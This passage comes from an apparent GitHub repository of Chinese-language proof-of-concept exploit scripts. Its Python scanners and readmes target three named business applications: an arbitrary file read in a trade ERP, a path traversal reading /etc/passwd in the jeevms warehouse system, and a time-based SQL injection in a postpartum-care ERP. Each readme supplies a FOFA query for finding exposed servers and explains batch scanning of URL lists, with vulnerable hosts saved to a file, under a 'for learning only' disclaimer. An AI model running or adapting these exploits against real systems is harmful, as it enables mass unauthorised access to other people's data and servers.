98 | url_list = [] 99 | with open(args.file, "r", encoding="utf-8") as f: 100 | for url in f.readlines(): 101 | url = url.strip().replace("\n", "") 102 | if "https://" in url or "http://" in url: 103 | url = url 104 | else: 105 | host, port = extract_host(url) 106 | url = f"http://{host}:{port}" 107 | url_list.append(url) 108 | 109 | pool = Pool(10) 110 | pool.map(poc, url_list) 111 | pool.close() 112 | pool.join() 113 | 114 | else: 115 | parser.print_help() 116 | 117 | 118 | if __name__ == '__main__': 119 | main() 120 | -------------------------------------------------------------------------------- /20240416睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | body="loginNeedMobileNumVerification" || body="睿贝软件" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240419jeevms 仓库管理系统 fileread文件读取漏洞/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240419jeevms 仓库管理系统 fileread文件读取漏洞/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240419jeevms 仓库管理系统 fileread文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a jeevms 仓库管理系统 fileread文件读取漏洞 poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd" 40 | url = target + path 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36' 43 | } 44 | 45 | try: 46 | # conn = http.client.HTTPConnection(target) 47 | # conn.request("POST", path, body.encode("utf-8"), headers) 48 | # response1 = conn.getresponse() 49 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 50 | 51 | if response1.status_code == 200 and "root" in response1.text: 52 | print(f"[++++++] {target} 存在任意文件读取") 53 | # print("响应体内容:", response1.text) 54 | with open("result.txt", "a+", encoding="utf-8") as f: 55 | f.write(target + "\n") 56 | else: 57 | print(f"[-] {target} 未发现") 58 | 59 | except Exception as e: 60 | print(f"[*] {target} error: {str(e)}") 61 | 62 | 63 | def extract_host(url): 64 | """ 65 | 从 URL 中提取主机地址和端口号,返回 (host, port) 66 | """ 67 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 68 | if match: 69 | prefix, host, port = match.groups() 70 | if not port: 71 | if prefix and "https" in prefix: 72 | port = "443" 73 | else: 74 | port = "80" 75 | return host, int(port) 76 | else: 77 | return None, None 78 | 79 | 80 | def main(): 81 | banner() 82 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 83 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 84 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 85 | args = parser.parse_args() 86 | 87 | if args.url and not args.file: 88 | if "https://" in args.url or "http://" in args.url: 89 | url = args.url 90 | else: 91 | host, port = extract_host(args.url) 92 | url = f"http://{host}:{port}" 93 | poc(url) 94 | 95 | elif args.url is None and args.file is not None: 96 | url_list = [] 97 | with open(args.file, "r", encoding="utf-8") as f: 98 | for url in f.readlines(): 99 | url = url.strip().replace("\n", "") 100 | if "https://" in url or "http://" in url: 101 | url = url 102 | else: 103 | host, port = extract_host(url) 104 | url = f"http://{host}:{port}" 105 | url_list.append(url) 106 | 107 | pool = Pool(10) 108 | pool.map(poc, url_list) 109 | pool.close() 110 | pool.join() 111 | 112 | else: 113 | parser.print_help() 114 | 115 | 116 | if __name__ == '__main__': 117 | main() 118 | -------------------------------------------------------------------------------- /20240419jeevms 仓库管理系统 fileread文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # jeevms 仓库管理系统 fileread文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240420月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240420月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240420月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/Page/SalerManager/StarryQuoteEdit.aspx?id=1;WAITFOR+DELAY+'0:0:3'--" 40 | url = target + path 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36' 43 | } 44 | 45 | try: 46 | # conn = http.client.HTTPConnection(target) 47 | # conn.request("POST", path, body.encode("utf-8"), headers) 48 | # response1 = conn.getresponse() 49 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 50 | 51 | if response1.status_code == 200 and response1.elapsed.total_seconds() > 2: 52 | print(f"[++++++] {target} 存在sql") 53 | # print("响应体内容:", response1.text) 54 | with open("result.txt", "a+", encoding="utf-8") as f: 55 | f.write(target + "\n") 56 | else: 57 | print(f"[-] {target} 未发现") 58 | 59 | except Exception as e: 60 | print(f"[*] {target} error: {str(e)}") 61 | 62 | 63 | def extract_host(url): 64 | """ 65 | 从 URL 中提取主机地址和端口号,返回 (host, port) 66 | """ 67 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 68 | if match: 69 | prefix, host, port = match.groups() 70 | if not port: 71 | if prefix and "https" in prefix: 72 | port = "443" 73 | else: 74 | port = "80" 75 | return host, int(port) 76 | else: 77 | return None, None 78 | 79 | 80 | def main(): 81 | banner() 82 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 83 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 84 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 85 | args = parser.parse_args() 86 | 87 | if args.url and not args.file: 88 | if "https://" in args.url or "http://" in args.url: 89 | url = args.url 90 | else: 91 | host, port = extract_host(args.url) 92 | url = f"http://{host}:{port}" 93 | poc(url) 94 | 95 | elif args.url is None and args.file is not None: 96 | url_list = [] 97 | with open(args.file, "r", encoding="utf-8") as f: 98 | for url in f.readlines(): 99 | url = url.strip().replace("\n", "") 100 | if "https://" in url or "http://" in url: 101 | url = url 102 | else: 103 | host, port = extract_host(url) 104 | url = f"http://{host}:{port}" 105 | url_list.append(url) 106 | 107 | pool = Pool(10) 108 | pool.map(poc, url_list) 109 | pool.close() 110 | pool.join() 111 | 112 | else: 113 | parser.print_help() 114 | 115 | 116 | if __name__ == '__main__': 117 | main() 118 | -------------------------------------------------------------------------------- /20240420月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:body="月子护理ERP管理平台" || body="妈妈宝盒客户端.rar" || body="Page/Login/Login3.aspx" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | --------------------------------------------------------------------------------